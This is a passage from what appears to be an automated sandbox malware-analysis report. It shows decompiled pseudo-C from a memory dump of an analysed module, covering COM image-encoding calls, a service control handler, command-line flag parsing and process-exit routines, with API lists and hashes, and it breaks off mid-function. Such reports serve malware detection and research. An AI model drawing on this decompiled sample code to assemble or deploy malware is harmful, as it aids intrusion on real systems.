                                                                                                                        • Instruction Fuzzy Hash: 18F0C273A0435467DB24EB68DC42FD773ACAB94704F00041DB684DB2C1EAB2A558CB95
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F336480, Relevance: 7.7, APIs: 5, Instructions: 205comCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 31%
                                                                                                                        			E6F336480() {
				intOrPtr* _v24;
				intOrPtr _v40;
				void* _v104;
				void* _v112;
				intOrPtr* _v124;
				char _v128;
				char* _v132;
				char _v136;
				intOrPtr* _v140;
				intOrPtr* _v144;
				char _v148;
				intOrPtr* _v152;
				intOrPtr* _v160;
				void* _v164;
				intOrPtr _v168;
				intOrPtr* _v180;
				void* _v184;
				char _v192;
				short _v196;
				char _v200;
				intOrPtr* _v208;
				intOrPtr _v224;
				intOrPtr* _v236;
				intOrPtr* _v244;
				intOrPtr* _v256;
				intOrPtr* _v264;
				intOrPtr* _v276;
				char* _t66;
				intOrPtr* _t68;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t83;
				intOrPtr* _t86;
				intOrPtr* _t89;
				intOrPtr* _t91;
				intOrPtr* _t95;
				intOrPtr* _t98;
				intOrPtr* _t101;
				intOrPtr* _t103;
				intOrPtr* _t105;
				intOrPtr* _t108;
				intOrPtr* _t111;
				intOrPtr* _t114;
				intOrPtr* _t116;
				short _t164;

				_t164 = 0;
				__imp__CoInitializeEx(0, 0);
				_t66 =  &_v104;
				_v104 = 0;
				__imp__CoCreateInstance(0x6f33db8c, 0, 1, 0x6f33ddac, _t66);
				if(_t66 < 0) {
					L19:
					__imp__CoUninitialize();
					return _t164;
				}
				_t68 = _v124;
				_push( &_v112);
				_push(2);
				_push(0);
				_v112 = 0;
				_push( *_v24);
				_push(_t68);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t68 + 0x54))))() < 0) {
					L18:
					_t71 = _v144;
					 *((intOrPtr*)( *((intOrPtr*)( *_t71 + 8))))(_t71);
					goto L19;
				}
				_t73 = _v144;
				_v136 = 0;
				_push( &_v136);
				_push(_t73);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t73 + 0x38))))() < 0) {
					L17:
					_t76 = _v140;
					 *((intOrPtr*)( *((intOrPtr*)( *_t76 + 8))))(_t76);
					goto L18;
				}
				_t78 = _v144;
				_push(_v40);
				_push(_t78);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t78 + 0x38))))() < 0) {
					L16:
					_t81 = _v152;
					 *((intOrPtr*)( *((intOrPtr*)( *_t81 + 8))))(_t81);
					goto L17;
				}
				asm("movq xmm0, [0x6f33db9c]");
				_t83 = _v160;
				_push( &_v164);
				asm("movq [esp+0x30], xmm0");
				asm("movq xmm0, [0x6f33dba4]");
				_push( &_v128);
				_v164 = 0;
				asm("movq [esp+0x3c], xmm0");
				_push(0x6f33dbac);
				_push(_t83);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t83 + 0x20))))() < 0) {
					goto L16;
				}
				_t86 = _v180;
				_push(2);
				_push(_v168);
				_push(_t86);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t86 + 0xc))))() < 0) {
					L15:
					_t89 = _v192;
					 *((intOrPtr*)( *((intOrPtr*)( *_t89 + 8))))(_t89);
					goto L16;
				}
				_t91 = _v192;
				_push( &_v184);
				_v196 = 0;
				_v184 = 0;
				_push( &_v196);
				_push(_t91);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t91 + 0x28))))() >= 0) {
					L6F33C2EE();
					_v132 = L"ImageQuality";
					__imp__#8( &_v192,  &_v136, 0x20);
					asm("movss xmm0, [0x6f33da54]");
					_v196 = 4;
					_t95 = _v208;
					asm("movss [esp+0x2c], xmm0");
					 *((intOrPtr*)( *((intOrPtr*)( *_t95 + 0x10))))(_t95, 1,  &_v148,  &_v196);
					_t98 = _v236;
					_push(_v224);
					_push(_t98);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t98 + 0xc))))() >= 0) {
						asm("movq xmm0, [0x6f33dbbc]");
						_t105 = _v244;
						_push(_v128);
						asm("movq [esp+0x40], xmm0");
						asm("movq xmm0, [0x6f33dbc4]");
						asm("movq [esp+0x48], xmm0");
						_push(_v132);
						_push(_t105);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t105 + 0x10))))() >= 0) {
							_t108 = _v256;
							_push( &_v200);
							_push(_t108);
							if( *((intOrPtr*)( *((intOrPtr*)( *_t108 + 0x18))))() >= 0) {
								_t111 = _v264;
								_push(0);
								_push(_v244);
								_push(_t111);
								if( *((intOrPtr*)( *((intOrPtr*)( *_t111 + 0x2c))))() >= 0) {
									_t114 = _v276;
									_push(_t114);
									if( *((intOrPtr*)( *((intOrPtr*)( *_t114 + 0x30))))() >= 0) {
										_t116 = _v276;
										_push(_t116);
										if( *((intOrPtr*)( *((intOrPtr*)( *_t116 + 0x2c))))() >= 0) {
											_t164 = 1;
										}
									}
								}
							}
						}
					}
					_t101 = _v244;
					 *((intOrPtr*)( *((intOrPtr*)( *_t101 + 8))))(_t101);
					_t103 = _v236;
					 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 8))))(_t103);
				}
			}



















































                                                                                                                        0x6f336484
                                                                                                                        0x6f336488
                                                                                                                        0x6f33648e
                                                                                                                        0x6f3364a0
                                                                                                                        0x6f3364a4
                                                                                                                        0x6f3364ac
                                                                                                                        0x6f3366c9
                                                                                                                        0x6f3366c9
                                                                                                                        0x6f3366d5
                                                                                                                        0x6f3366d5
                                                                                                                        0x6f3364b2
                                                                                                                        0x6f3364ba
                                                                                                                        0x6f3364c1
                                                                                                                        0x6f3364c3
                                                                                                                        0x6f3364c4
                                                                                                                        0x6f3364ca
                                                                                                                        0x6f3364cb
                                                                                                                        0x6f3364d3
                                                                                                                        0x6f3366bd
                                                                                                                        0x6f3366bd
                                                                                                                        0x6f3366c7
                                                                                                                        0x00000000
                                                                                                                        0x6f3366c7
                                                                                                                        0x6f3364d9
                                                                                                                        0x6f3364e1
                                                                                                                        0x6f3364e7
                                                                                                                        0x6f3364e8
                                                                                                                        0x6f3364f0
                                                                                                                        0x6f3366b1
                                                                                                                        0x6f3366b1
                                                                                                                        0x6f3366bb
                                                                                                                        0x00000000
                                                                                                                        0x6f3366bb
                                                                                                                        0x6f3364f6
                                                                                                                        0x6f336500
                                                                                                                        0x6f336501
                                                                                                                        0x6f336509
                                                                                                                        0x6f3366a5
                                                                                                                        0x6f3366a5
                                                                                                                        0x6f3366af
                                                                                                                        0x00000000
                                                                                                                        0x6f3366af
                                                                                                                        0x6f33650f
                                                                                                                        0x6f336517
                                                                                                                        0x6f33651f
                                                                                                                        0x6f336524
                                                                                                                        0x6f33652a
                                                                                                                        0x6f336532
                                                                                                                        0x6f336533
                                                                                                                        0x6f336537
                                                                                                                        0x6f33653f
                                                                                                                        0x6f336544
                                                                                                                        0x6f33654c
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f336552
                                                                                                                        0x6f33655c
                                                                                                                        0x6f33655e
                                                                                                                        0x6f33655f
                                                                                                                        0x6f336567
                                                                                                                        0x6f336699
                                                                                                                        0x6f336699
                                                                                                                        0x6f3366a3
                                                                                                                        0x00000000
                                                                                                                        0x6f3366a3
                                                                                                                        0x6f33656d
                                                                                                                        0x6f336575
                                                                                                                        0x6f33657a
                                                                                                                        0x6f33657e
                                                                                                                        0x6f336584
                                                                                                                        0x6f336585
                                                                                                                        0x6f33658d
                                                                                                                        0x6f33659a
                                                                                                                        0x6f3365a4
                                                                                                                        0x6f3365ac
                                                                                                                        0x6f3365b2
                                                                                                                        0x6f3365c4
                                                                                                                        0x6f3365c9
                                                                                                                        0x6f3365d2
                                                                                                                        0x6f3365e0
                                                                                                                        0x6f3365e2
                                                                                                                        0x6f3365ec
                                                                                                                        0x6f3365ed
                                                                                                                        0x6f3365f5
                                                                                                                        0x6f3365ff
                                                                                                                        0x6f336607
                                                                                                                        0x6f33660b
                                                                                                                        0x6f336610
                                                                                                                        0x6f336616
                                                                                                                        0x6f33661e
                                                                                                                        0x6f336626
                                                                                                                        0x6f336627
                                                                                                                        0x6f33662f
                                                                                                                        0x6f336631
                                                                                                                        0x6f33663b
                                                                                                                        0x6f33663c
                                                                                                                        0x6f336644
                                                                                                                        0x6f336646
                                                                                                                        0x6f336650
                                                                                                                        0x6f336651
                                                                                                                        0x6f336652
                                                                                                                        0x6f33665a
                                                                                                                        0x6f33665c
                                                                                                                        0x6f336665
                                                                                                                        0x6f33666a
                                                                                                                        0x6f33666c
                                                                                                                        0x6f336675
                                                                                                                        0x6f33667a
                                                                                                                        0x6f33667c
                                                                                                                        0x6f33667c
                                                                                                                        0x6f33667a
                                                                                                                        0x6f33666a
                                                                                                                        0x6f33665a
                                                                                                                        0x6f336644
                                                                                                                        0x6f33662f
                                                                                                                        0x6f336681
                                                                                                                        0x6f33668b
                                                                                                                        0x6f33668d
                                                                                                                        0x6f336697
                                                                                                                        0x6f336697

                                                                                                                        APIs
                                                                                                                        • CoInitializeEx.OLE32(00000000,00000000,00000000), ref: 6F336488
                                                                                                                        • CoCreateInstance.OLE32(6F33DB8C,00000000,00000001,6F33DDAC,?), ref: 6F3364A4
                                                                                                                        • RtlZeroMemory.NTDLL(?,00000020), ref: 6F33659A
                                                                                                                        • VariantInit.OLEAUT32 ref: 6F3365AC
                                                                                                                        • CoUninitialize.OLE32 ref: 6F3366C9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CreateInitInitializeInstanceMemoryUninitializeVariantZero
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 884428471-0
                                                                                                                        • Opcode ID: b67523bdddf209c53f44a973d2dff45fd6fe49b1b54c34612766d1d332be107a
                                                                                                                        • Instruction ID: a9ac813da4e52ee20f93106de82698f31dffcf15b40d92ed829c1863a2887f0f
                                                                                                                        • Opcode Fuzzy Hash: b67523bdddf209c53f44a973d2dff45fd6fe49b1b54c34612766d1d332be107a
                                                                                                                        • Instruction Fuzzy Hash: A371D0B5604752AFD610DF69C880E5BB7F9AFC9744F108A5DF949CB260DB30E802CB62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33C13A, Relevance: 7.5, APIs: 5, Instructions: 49timethreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33C13A() {
				struct _FILETIME _v12;
				signed int _v16;
				union _LARGE_INTEGER _v20;
				signed int _t14;
				signed int _t16;
				signed int _t17;
				signed int _t18;
				signed int _t22;
				signed int _t23;
				signed int _t32;

				_t14 =  *0x6f340264; // 0x363cc749
				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				_v12.dwHighDateTime = _v12.dwHighDateTime & 0x00000000;
				if(_t14 == 0xbb40e64e || (0xffff0000 & _t14) == 0) {
					GetSystemTimeAsFileTime( &_v12);
					_t16 = GetCurrentProcessId();
					_t17 = GetCurrentThreadId();
					_t18 = GetTickCount();
					QueryPerformanceCounter( &_v20);
					_t22 = _v16 ^ _v20.LowPart;
					_t32 = _v12.dwHighDateTime ^ _v12.dwLowDateTime ^ _t16 ^ _t17 ^ _t18 ^ _t22;
					if(_t32 == 0xbb40e64e || ( *0x6f340264 & 0xffff0000) == 0) {
						_t32 = 0xbb40e64f;
					}
					 *0x6f340264 = _t32;
					 *0x6f340268 =  !_t32;
					return _t22;
				} else {
					_t23 =  !_t14;
					 *0x6f340268 = _t23;
					return _t23;
				}
			}













                                                                                                                        0x6f33c142
                                                                                                                        0x6f33c147
                                                                                                                        0x6f33c14b
                                                                                                                        0x6f33c15d
                                                                                                                        0x6f33c171
                                                                                                                        0x6f33c17d
                                                                                                                        0x6f33c185
                                                                                                                        0x6f33c18d
                                                                                                                        0x6f33c199
                                                                                                                        0x6f33c1a2
                                                                                                                        0x6f33c1a5
                                                                                                                        0x6f33c1a9
                                                                                                                        0x6f33c1b3
                                                                                                                        0x6f33c1b3
                                                                                                                        0x6f33c1b8
                                                                                                                        0x6f33c1c0
                                                                                                                        0x00000000
                                                                                                                        0x6f33c163
                                                                                                                        0x6f33c163
                                                                                                                        0x6f33c165
                                                                                                                        0x00000000
                                                                                                                        0x6f33c165

                                                                                                                        APIs
                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 6F33C171
                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 6F33C17D
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6F33C185
                                                                                                                        • GetTickCount.KERNEL32 ref: 6F33C18D
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 6F33C199
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1445889803-0
                                                                                                                        • Opcode ID: eef9a7c3295c226a5235201894336f2e9d192f466f08500627768503cdccbb11
                                                                                                                        • Instruction ID: d6c5491c1d20ec5ae5364ca9b800365bae88bd44d49d82afefd14c1119ee2fc5
                                                                                                                        • Opcode Fuzzy Hash: eef9a7c3295c226a5235201894336f2e9d192f466f08500627768503cdccbb11
                                                                                                                        • Instruction Fuzzy Hash: 810188B3D00A759BDF10EBB4C54859EB7FDEB4A361F51091AE811E7154DB709924CB80
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F333A70, Relevance: 7.5, APIs: 5, Instructions: 47memorythreadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F333A70(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t9;

				_t9 = _a4 - 1;
				if(_t9 > 0xd) {
					L10:
					SetServiceStatus( *0x6f340394, 0x6f34043c);
					return 0;
				}
				switch( *((intOrPtr*)(( *(_t9 + 0x6f333b48) & 0x000000ff) * 4 +  &M6F333B34))) {
					case 0:
						 *0x6f340440 = 1;
						 *0x6f340448 = 0;
						 *0x6f340450 = 0;
						 *0x6f340454 = 0;
						goto L10;
					case 1:
						 *0x6f340440 = 7;
						goto L10;
					case 2:
						 *0x6f340440 = 4;
						goto L10;
					case 3:
						if(_a8 == 5) {
							_t13 = _a12;
							_t20 = _t19 | 0xffffffff;
							if(_t13 != 0) {
								_t20 =  *(_t13 + 4);
							}
							_t15 = HeapAlloc(GetProcessHeap(), 8, 4);
							if(_t15 != 0) {
								 *_t15 = _t20;
								CloseHandle(CreateThread(0, 0, E6F333930, _t15, 0, 0));
							}
						}
						goto L10;
					case 4:
						goto L10;
				}
			}




                                                                                                                        0x6f333a74
                                                                                                                        0x6f333a79
                                                                                                                        0x6f333b1a
                                                                                                                        0x6f333b26
                                                                                                                        0x6f333b2f
                                                                                                                        0x6f333b2f
                                                                                                                        0x6f333a86
                                                                                                                        0x00000000
                                                                                                                        0x6f333af2
                                                                                                                        0x6f333afc
                                                                                                                        0x6f333b06
                                                                                                                        0x6f333b10
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f333ada
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f333ae6
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f333a92
                                                                                                                        0x6f333a98
                                                                                                                        0x6f333a9c
                                                                                                                        0x6f333aa1
                                                                                                                        0x6f333aa3
                                                                                                                        0x6f333aa3
                                                                                                                        0x6f333ab1
                                                                                                                        0x6f333ab9
                                                                                                                        0x6f333ac9
                                                                                                                        0x6f333ad2
                                                                                                                        0x6f333ad2
                                                                                                                        0x6f333ab9
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000004), ref: 6F333AAA
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F333AB1
                                                                                                                        • CreateThread.KERNEL32 ref: 6F333ACB
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F333AD2
                                                                                                                        • SetServiceStatus.ADVAPI32(00000000,6F34043C), ref: 6F333B26
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$AllocCloseCreateHandleProcessServiceStatusThread
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3654718518-0
                                                                                                                        • Opcode ID: aa1efb9f6c07cb329115d044f5e6efb0496722ea239d2bec41fa2f3847d00fd6
                                                                                                                        • Instruction ID: 29d6f13638d0993f3e0a8b13f1bf11f7bfa277bd62d3ba558cd9a01db6c5939e
                                                                                                                        • Opcode Fuzzy Hash: aa1efb9f6c07cb329115d044f5e6efb0496722ea239d2bec41fa2f3847d00fd6
                                                                                                                        • Instruction Fuzzy Hash: EC115EB2B046A4EBEB10EF60C91AB1537ACF722724F00850CF985CB2C1CB75E4698F16
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F332D55, Relevance: 7.5, APIs: 5, Instructions: 34sleepwindowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F332D55() {
				struct HWND__* _t1;
				int _t3;
				void* _t7;

				if(_t1 != 0) {
					_t3 = IsWindow(_t1);
					_t1 =  *0x6f340398; // 0x0
					if(_t3 != 0) {
						PostMessageA(_t1, 0x10, 0, 0);
						_t1 =  *0x6f340398; // 0x0
					}
				}
				_t7 = 0;
				while(_t1 != 0 && IsWindow(_t1) != 0) {
					Sleep(0x3e8);
					_t7 = _t7 + 1;
					if(_t7 < 0xa) {
						_t1 =  *0x6f340398; // 0x0
						continue;
					}
					break;
				}
				ExitProcess(0);
			}






                                                                                                                        0x6f332d60
                                                                                                                        0x6f332d63
                                                                                                                        0x6f332d67
                                                                                                                        0x6f332d6c
                                                                                                                        0x6f332d75
                                                                                                                        0x6f332d7b
                                                                                                                        0x6f332d7b
                                                                                                                        0x6f332d6c
                                                                                                                        0x6f332d86
                                                                                                                        0x6f332d95
                                                                                                                        0x6f332da5
                                                                                                                        0x6f332da7
                                                                                                                        0x6f332dab
                                                                                                                        0x6f332d90
                                                                                                                        0x00000000
                                                                                                                        0x6f332d90
                                                                                                                        0x00000000
                                                                                                                        0x6f332dab
                                                                                                                        0x6f332daf

                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$ExitMessagePostProcessSleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1225241566-0
                                                                                                                        • Opcode ID: 5ecc4f31d18012f8fa3adfb5de54ad6d1765e610e70a559fe1b8a5b8db3526fd
                                                                                                                        • Instruction ID: 681eb7bd4e2cc7ea85cb19955f47721dbf716eab7accb08b31090a93cd8af42a
                                                                                                                        • Opcode Fuzzy Hash: 5ecc4f31d18012f8fa3adfb5de54ad6d1765e610e70a559fe1b8a5b8db3526fd
                                                                                                                        • Instruction Fuzzy Hash: D7F0AE73F407A697EA50D7798D85F46779C974AB21F010514B954D7180C961F4114AB4
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F332340, Relevance: 7.5, APIs: 5, Instructions: 34sleepCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F332340(intOrPtr* _a4) {
				intOrPtr* _t15;

				Sleep(0xbb8);
				_t15 = _a4;
				if( *_t15 == 0 &&  *(_t15 + 0x38) != 0) {
					do {
						Sleep(0x7d0);
					} while (GetFileAttributesA( *(_t15 + 0x38)) != 0xffffffff);
					E6F331C00(_t15);
					VirtualFree( *(_t15 + 0x24), 0, 0x8000);
					 *(_t15 + 0x24) = 0;
					ExitProcess(0);
				}
				return 0;
			}




                                                                                                                        0x6f33234d
                                                                                                                        0x6f33234f
                                                                                                                        0x6f332356
                                                                                                                        0x6f332365
                                                                                                                        0x6f33236a
                                                                                                                        0x6f332372
                                                                                                                        0x6f332378
                                                                                                                        0x6f33238b
                                                                                                                        0x6f332393
                                                                                                                        0x6f33239a
                                                                                                                        0x6f33239a
                                                                                                                        0x6f3323a5

                                                                                                                        APIs
                                                                                                                        • Sleep.KERNEL32(00000BB8), ref: 6F33234D
                                                                                                                        • Sleep.KERNEL32(000007D0), ref: 6F33236A
                                                                                                                        • GetFileAttributesA.KERNEL32(00000000), ref: 6F332370
                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 6F33238B
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F33239A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Sleep$AttributesExitFileFreeProcessVirtual
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4254501734-0
                                                                                                                        • Opcode ID: e3055ee782c37a465b9567625543a0f5655fb139d49061dc21d7a3ddf729c738
                                                                                                                        • Instruction ID: 569a18e446c410d1e6072e679a0f8067d002a8a09c78fe39bb27979818edb659
                                                                                                                        • Opcode Fuzzy Hash: e3055ee782c37a465b9567625543a0f5655fb139d49061dc21d7a3ddf729c738
                                                                                                                        • Instruction Fuzzy Hash: 43F09A32900B54ABD760EB66CD84B46B3ACBF45B34F210A1DE2869A0C0C7B4F450CAA5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33A230, Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F33A230() {
				int _v4;
				char _v7;
				char _v8;
				intOrPtr* _t15;
				char _t18;
				int _t23;
				signed int _t29;
				void* _t32;

				if(GetCommandLineA() == 0) {
					L20:
					ExitProcess(0);
				}
				_v4 = 0;
				_t32 = E6F33A3D0(_t12,  &_v4);
				if(_t32 == 0) {
					L19:
					goto L20;
				}
				_t23 = _v4;
				if(_t23 <= 2) {
					L18:
					LocalFree(_t32);
					goto L19;
				}
				_t29 = 2;
				if(_t23 <= 2) {
					L17:
					goto L18;
				}
				do {
					_t15 =  *((intOrPtr*)(_t32 + _t29 * 4));
					if( *((char*)(_t15 + 1)) != 0) {
						goto L10;
					}
					_v8 =  *_t15;
					_v7 = 0;
					CharLowerA( &_v8);
					_t18 = _v8;
					if(_t18 == 0x66) {
						E6F33A130(1);
						L15:
						L16:
						goto L17;
					}
					if(_t18 == 0x65) {
						E6F33A130(0);
						goto L15;
					}
					if(_t18 == 0x75) {
						E6F339BD0(1);
						goto L15;
					}
					_t23 = _v4;
					L10:
					_t29 = _t29 + 1;
				} while (_t29 < _t23);
				goto L16;
			}











                                                                                                                        0x6f33a23b
                                                                                                                        0x6f33a2dd
                                                                                                                        0x6f33a2df
                                                                                                                        0x6f33a2df
                                                                                                                        0x6f33a248
                                                                                                                        0x6f33a255
                                                                                                                        0x6f33a25c
                                                                                                                        0x6f33a2dc
                                                                                                                        0x00000000
                                                                                                                        0x6f33a2dc
                                                                                                                        0x6f33a25e
                                                                                                                        0x6f33a265
                                                                                                                        0x6f33a2d5
                                                                                                                        0x6f33a2d6
                                                                                                                        0x00000000
                                                                                                                        0x6f33a2d6
                                                                                                                        0x6f33a268
                                                                                                                        0x6f33a26f
                                                                                                                        0x6f33a2d4
                                                                                                                        0x00000000
                                                                                                                        0x6f33a2d4
                                                                                                                        0x6f33a280
                                                                                                                        0x6f33a280
                                                                                                                        0x6f33a288
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f33a291
                                                                                                                        0x6f33a295
                                                                                                                        0x6f33a29a
                                                                                                                        0x6f33a29c
                                                                                                                        0x6f33a2a2
                                                                                                                        0x6f33a2b9
                                                                                                                        0x6f33a2d0
                                                                                                                        0x6f33a2d3
                                                                                                                        0x00000000
                                                                                                                        0x6f33a2d3
                                                                                                                        0x6f33a2a6
                                                                                                                        0x6f33a2c2
                                                                                                                        0x00000000
                                                                                                                        0x6f33a2c2
                                                                                                                        0x6f33a2aa
                                                                                                                        0x6f33a2cb
                                                                                                                        0x00000000
                                                                                                                        0x6f33a2cb
                                                                                                                        0x6f33a2ac
                                                                                                                        0x6f33a2b0
                                                                                                                        0x6f33a2b0
                                                                                                                        0x6f33a2b1
                                                                                                                        0x00000000

                                                                                                                        APIs
                                                                                                                        • GetCommandLineA.KERNEL32 ref: 6F33A233
                                                                                                                        • ExitProcess.KERNEL32 ref: 6F33A2DF
                                                                                                                          • Part of subcall function 6F33A3D0: lstrlenA.KERNEL32(?,?,?,?,00000000,?), ref: 6F33A3DB
                                                                                                                          • Part of subcall function 6F33A3D0: LocalAlloc.KERNEL32(00000040,00000004,?,?,?,00000000,?), ref: 6F33A3F4
                                                                                                                        • CharLowerA.USER32(?,?,?,?,?,?), ref: 6F33A29A
                                                                                                                        • LocalFree.KERNEL32(00000000,?), ref: 6F33A2D6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.410946846.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.410929497.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.410968304.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411025550.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000002.00000002.411060259.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Local$AllocCharCommandExitFreeLineLowerProcesslstrlen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4176052798-0
                                                                                                                        • Opcode ID: 45b02f9bcce8a1a4ee07437cb1ba249ed157c0e17c44d5675a529c353e9943aa
                                                                                                                        • Instruction ID: 62b543cad9f8bf822fa7c11b2b4b434f62112e2da109fba511b37d372d18994b
                                                                                                                        • Opcode Fuzzy Hash: 45b02f9bcce8a1a4ee07437cb1ba249ed157c0e17c44d5675a529c353e9943aa
                                                                                                                        • Instruction Fuzzy Hash: 6B11273BC4C3E89FDF00DAA88804B9A7BDE5F52315F00041AE09AC21C2C7A3A445A7A3
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F33A2F0, Relevance: 6.0, APIs: 4, Instructions: 49memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 90%
                                                                                                                        			E6F33A2F0(short* _a4, signed int _a8, intOrPtr* _a12) {
				intOrPtr* _t11;
				char* _t12;
				int _t13;
				int _t17;
				short* _t18;

				_t18 = _a4;
				_t12 = 0;
				asm("sbb esi, esi");
				_t17 =  ~_a8 & 0x0000fde9;
				_t13 = WideCharToMultiByte(_t17, 0, _t18, 0xffffffff, 0, 0, 0, 0);
				if(_t13 > 0) {
					_t3 = _t13 + 1; // 0x1
					_t12 = HeapAlloc(GetProcessHeap(), 8, _t3);
					WideCharToMultiByte(_t17, 0, _t18, 0xffffffff, _t12, _t13, 0, 0);
					_t11 = _a12;
